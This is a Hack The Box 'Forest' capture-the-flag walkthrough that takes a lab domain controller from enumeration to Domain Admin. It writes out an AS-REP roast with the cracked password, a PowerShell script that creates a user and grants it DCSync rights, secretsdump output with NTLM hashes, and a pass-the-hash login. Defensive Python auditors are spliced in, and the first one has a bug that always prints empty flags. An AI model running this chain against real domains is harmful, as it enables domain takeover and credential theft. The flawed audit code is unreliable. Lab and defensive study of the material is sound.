Forest
Let's start off with nmap:
nmap -sC -sV -oA nmap/ -T4 10.129.95.210
Results:
Nmap scan report for 10.129.95.210
Host is up (0.053s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-01-13 13:18:08Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h46m50s, deviation: 4h37m10s, median: 6m49s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-01-13T13:18:14
|_ start_date: 2023-01-13T13:14:57
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2023-01-13T05:18:15-08:00
Ports 53 (DNS) and 88 (Kerberos) are open, which indicates that we are dealing with Active Directory and, more specifically, a Domain Controller. The scan also gives us the domain name: htb.local.
Null sessions are not enabled on the target, but we can still do some enumeration over RPC using rpcclient:
rpcclient -U "" -N 10.129.95.210
There is a lot of interesting info we can query via rpcclient:
enumdomusers
Usernames are all we need here, but we could also use commands like
enumdomgroups
to get a list of all the groups and their RIDs,
querygroupmem <RID>
to list the members of a specific group, and
queryuser <RID>
to show more detailed info about a user.
The next step is to see what we can do with just usernames. One technique is AS-REP Roasting: when Kerberos pre-authentication is disabled for an account, anyone can request an AS-REP message for that account. The reply contains a Ticket Granting Ticket (TGT) issued by the Key Distribution Center (KDC), which the user would normally use for future access requests, and part of the reply is encrypted with the account's password hash, so it can be cracked offline. A good article on this can be found here
This can be exploited with the impacket script GetNPUsers.py. Before running it, add the users found above to a users.txt file, then run:
GetNPUsers.py htb.local/ -dc-ip 10.129.95.210 -usersfile users.txt -format hashcat -outputfile hashes.txt
The output lists the users for which the method did not work, but we get one hash in hashes.txt. The next step is to crack it with hashcat:
./hashcat.exe hashes.txt rockyou.txt
And we get the password of user svc-alfresco, which is 's3rvice'!
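From the defensive side, the condition that makes this attack possible is the "Do not require Kerberos preauthentication" bit in an account's userAccountControl attribute. The following Python is an added example, not part of this write-up or of any tool it mentions, that audits a list of accounts for that bit. The account list is constructed inline to stand in for an LDAP export; the flag values are the documented userAccountControl bits.

```python
# Added example (not from the original write-up): find accounts that an AS-REP
# roast would target, i.e. enabled accounts with the DONT_REQ_PREAUTH bit set in
# userAccountControl. The sample account list is constructed.

# Documented userAccountControl bit values.
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000

FLAG_NAMES = {
    UF_ACCOUNTDISABLE: "ACCOUNTDISABLE",
    UF_NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    UF_DONT_EXPIRE_PASSWD: "DONT_EXPIRE_PASSWD",
    UF_DONT_REQUIRE_PREAUTH: "DONT_REQ_PREAUTH",
}


def decode_uac(value):
    """Return the set of known flag names that are set in a userAccountControl value."""
    return {name for bit, name in FLAG_NAMES.items() if value & bit}


def find_asrep_roastable(accounts):
    """Return (sAMAccountName, severity) for enabled accounts without Kerberos pre-auth.

    Disabled accounts are skipped because the KDC will not issue an AS-REP for
    them. Severity is raised when the password also never expires, since the
    crackable material then never rotates.
    """
    findings = []
    for acct in accounts:
        uac = int(acct["userAccountControl"])
        if uac & UF_ACCOUNTDISABLE:
            continue
        if not uac & UF_DONT_REQUIRE_PREAUTH:
            continue
        severity = "high" if uac & UF_DONT_EXPIRE_PASSWD else "medium"
        findings.append((acct["sAMAccountName"], severity))
    return findings


# Constructed sample export: the values are illustrative, not real directory data.
SAMPLE_ACCOUNTS = [
    # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD | DONT_REQ_PREAUTH
    {"sAMAccountName": "svc-alfresco", "userAccountControl": 0x410200},
    # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD, pre-auth required: not roastable
    {"sAMAccountName": "jdoe", "userAccountControl": 0x10200},
    # DONT_REQ_PREAUTH but disabled: the KDC would refuse the request
    {"sAMAccountName": "svc-retired", "userAccountControl": 0x400202},
    # NORMAL_ACCOUNT | DONT_REQ_PREAUTH with an expiring password
    {"sAMAccountName": "asmith", "userAccountControl": 0x400200},
]

if __name__ == "__main__":
    for name, severity in find_asrep_roastable(SAMPLE_ACCOUNTS):
        print(f"{name}: pre-auth disabled ({severity}) flags={sorted(decode_uac(0))}")
```

Remediation is to clear the bit on the account (the Set-ADAccountControl cmdlet's -DoesNotRequirePreAuth $false switch does this) or, where an application genuinely needs it, give the account a long random password so the offline crack fails.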
Next step is to login to the box using evil-winrm:
evil-winrm -u svc-alfresco -p s3rvice -i 10.129.95.210
We get in! Next, let's enumerate the machine using BloodHound. With Evil-WinRM we can directly download and upload files in addition to executing PowerShell commands. Let's upload SharpHound.ps1 to the machine:
upload SharpHound.ps1
After uploading the file, first import its functions by running:
. ./SharpHound.ps1
Now we can call its functions from the Evil-WinRM PowerShell session. Let's run the default gathering function:
Invoke-BloodHound -CollectionMethod All
This command generates a zip file in the folder you run it from. Let's download the file:
download 20230113103531_BloodHound.zip
Next, let's open BloodHound, import the zip file and start enumerating.
Our target is Domain Admin so let's use one of Bloodhound's default analysis paths:
The initial result gives a path that I didn't manage to execute, so let's remove it:
The great thing about BloodHound is that when it manages to give a correct path, it even tells us which tools we could try and which PowerShell commands to run! I'm not going to paste the BloodHound instructions, but you can check the steps from the images below:
Basically, our user svc-alfresco is a member of the Service Accounts group, which is a member of the Privileged IT Accounts group, which is a member of the Account Operators group, which has full control over the Exchange Windows Permissions group, which in turn has permission to modify the DACL (Discretionary Access Control List) of the domain object. So what we need to do is add our user to the Exchange Windows Permissions group and then use that membership to add the same user to the domain's DACL.
To do this, first download powerview.ps1 and upload it to the machine using Evil-WinRM.
Next, create a file script.ps1 with contents:
Import-Module .\powerview.ps1
net user zolaboo password /add /domain
net group "Exchange Windows Permissions" /add zolaboo
$SecPassword = ConvertTo-SecureString 'password' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('HTB\zolaboo', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'zolaboo' -TargetIdentity 'DC=htb,DC=local' -Rights DCSync
This script loads the PowerView functions, creates a new user and adds it to the group, and then grants that user DCSync rights on the domain.
Upload it to the machine:
Next, run the script with
./script.ps1
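The change the script makes is visible in the DACL of the domain object: a new trustee now holds the two replication extended rights that DCSync needs. The following Python is an added example, not part of this write-up or of PowerView, that audits such a DACL for unexpected holders. ACEs are modelled as dicts with simplified field names loosely based on PowerView's Get-DomainObjectAcl output, with SIDs assumed to be already resolved to names; the ACE list and the baseline of expected holders are constructed.

```python
# Added example (not from the original write-up or PowerView): audit the DACL of
# the domain object for principals that hold the replication rights DCSync needs.
# Each ACE is a dict with simplified field names (Trustee, AceType, Rights,
# ObjectType); the ACE list below is constructed.

# Extended-right GUIDs from the AD schema (real values).
GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
# An ExtendedRight ACE with an empty ObjectType grants every extended right.
ALL_EXTENDED_RIGHTS = "00000000-0000-0000-0000-000000000000"
REPLICATION_RIGHTS = frozenset({GET_CHANGES, GET_CHANGES_ALL})

# Assumed baseline: principals that legitimately replicate in a default domain.
EXPECTED_HOLDERS = frozenset({
    "HTB\\Domain Controllers",
    "NT AUTHORITY\\ENTERPRISE DOMAIN CONTROLLERS",
    "BUILTIN\\Administrators",
    "HTB\\Domain Admins",
    "HTB\\Enterprise Admins",
})


def dcsync_holders(aces):
    """Map each trustee to the set of replication-right GUIDs it is allowed.

    Only Allow ACEs count. GenericAll, or ExtendedRight with an empty ObjectType,
    implies every extended right and therefore both replication rights at once.
    """
    holders = {}
    for ace in aces:
        if ace["AceType"] not in ("AccessAllowed", "AccessAllowedObject"):
            continue  # Deny and audit ACEs grant nothing
        rights = ace["Rights"]
        object_type = ace.get("ObjectType", ALL_EXTENDED_RIGHTS).lower()
        if "GenericAll" in rights:
            granted = set(REPLICATION_RIGHTS)
        elif "ExtendedRight" in rights and object_type == ALL_EXTENDED_RIGHTS:
            granted = set(REPLICATION_RIGHTS)
        elif "ExtendedRight" in rights and object_type in REPLICATION_RIGHTS:
            granted = {object_type}
        else:
            continue  # e.g. WriteDacl: dangerous, but not a replication right itself
        holders.setdefault(ace["Trustee"], set()).update(granted)
    return holders


def unexpected_dcsync(aces, expected=EXPECTED_HOLDERS):
    """Trustees outside the expected set that hold BOTH rights, i.e. can run DCSync."""
    return sorted(
        who for who, rights in dcsync_holders(aces).items()
        if rights == REPLICATION_RIGHTS and who not in expected
    )


# Constructed sample DACL of the domain object.
SAMPLE_ACES = [
    {"Trustee": "HTB\\Domain Controllers", "AceType": "AccessAllowedObject",
     "Rights": ["ExtendedRight"], "ObjectType": GET_CHANGES},
    {"Trustee": "HTB\\Domain Controllers", "AceType": "AccessAllowedObject",
     "Rights": ["ExtendedRight"], "ObjectType": GET_CHANGES_ALL},
    {"Trustee": "BUILTIN\\Administrators", "AceType": "AccessAllowed",
     "Rights": ["GenericAll"]},
    # WriteDacl on the domain (the Exchange group's position in the path above)
    {"Trustee": "HTB\\Exchange Windows Permissions", "AceType": "AccessAllowed",
     "Rights": ["WriteDacl", "WriteOwner"]},
    # Only one of the two rights: cannot replicate secrets on its own
    {"Trustee": "HTB\\svc-monitor", "AceType": "AccessAllowedObject",
     "Rights": ["ExtendedRight"], "ObjectType": GET_CHANGES},
    # Empty ObjectType: all extended rights, so both replication rights
    {"Trustee": "HTB\\svc-legacy", "AceType": "AccessAllowedObject",
     "Rights": ["ExtendedRight"], "ObjectType": ALL_EXTENDED_RIGHTS},
    # What the script above leaves behind
    {"Trustee": "HTB\\zolaboo", "AceType": "AccessAllowedObject",
     "Rights": ["ExtendedRight"], "ObjectType": GET_CHANGES},
    {"Trustee": "HTB\\zolaboo", "AceType": "AccessAllowedObject",
     "Rights": ["ExtendedRight"], "ObjectType": GET_CHANGES_ALL},
    {"Trustee": "HTB\\former-admin", "AceType": "AccessDenied",
     "Rights": ["GenericAll"]},
]

if __name__ == "__main__":
    for who in unexpected_dcsync(SAMPLE_ACES):
        print(f"unexpected DCSync holder: {who}")
```

Running such a check on a schedule, and alerting on any change to the domain object's DACL (Windows event 5136 on the directory service object), turns the last step of this attack path into a detection.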
Now run secretsdump on your attack machine:
secretsdump.py zolaboo:password@10.129.95.210
And we get hashes!
joonas@joonas-VirtualBox:~/Documents/htb/forest$ secretsdump.py zolaboo:password@10.129.95.210
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
...
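The same domain\uid:rid:lmhash:nthash::: format is what a defender reviews when auditing an NTDS.dit extract for password hygiene. The following Python is an added example, not part of this write-up or of Impacket, that parses such lines and flags empty passwords, leftover LM hashes and accounts sharing a password. The sample dump is constructed; the only real values in it are the two well-known placeholder hashes (the empty LM hash and the NT hash of an empty password).

```python
# Added example (not from the original write-up or Impacket): parse lines in the
# domain\uid:rid:lmhash:nthash::: format and flag hygiene problems. The sample
# dump below is constructed; the placeholder hashes EMPTY_LM and EMPTY_NT are
# the real well-known values.
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash stored when LM is disabled/empty
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^\\:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)


def parse_dump(text):
    """Return one dict per credential line; status lines and '...' are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rec = m.groupdict()
            rec["rid"] = int(rec["rid"])
            records.append(rec)
    return records


def audit(records):
    """Return {finding: [...]} over parsed records.

    empty_password: NT hash equals the hash of "" (account has no password).
    lm_hash_stored: a real LM hash is still kept (legacy, trivially crackable).
    shared_password: several accounts share one NT hash (password reuse).
    """
    findings = defaultdict(list)
    by_nt = defaultdict(list)
    for r in records:
        if r["nt"] == EMPTY_NT:
            findings["empty_password"].append(r["user"])
        if r["lm"] != EMPTY_LM:
            findings["lm_hash_stored"].append(r["user"])
        by_nt[r["nt"]].append(r["user"])
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            findings["shared_password"].append(sorted(users))
    return dict(findings)


# Constructed sample; hashes other than the two placeholders are made-up hex.
SAMPLE_DUMP = r"""[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
corp.example\Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
corp.example\svc-backup:1105:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
corp.example\legacyuser:1106:33333333333333333333333333333333:44444444444444444444444444444444:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
...
"""

if __name__ == "__main__":
    for finding, items in audit(parse_dump(SAMPLE_DUMP)).items():
        print(f"{finding}: {items}")
```

Built-in Guest and DefaultAccount normally carry the empty NT hash because they are disabled, so the empty_password finding is only interesting for enabled accounts; cross-checking against userAccountControl, as in the earlier audit, removes that noise.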
With the Administrator NTLM hash we can log in to the machine as admin using Evil-WinRM by passing the NT hash with -H:
evil-winrm -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6 -i 10.129.95.210
To be continued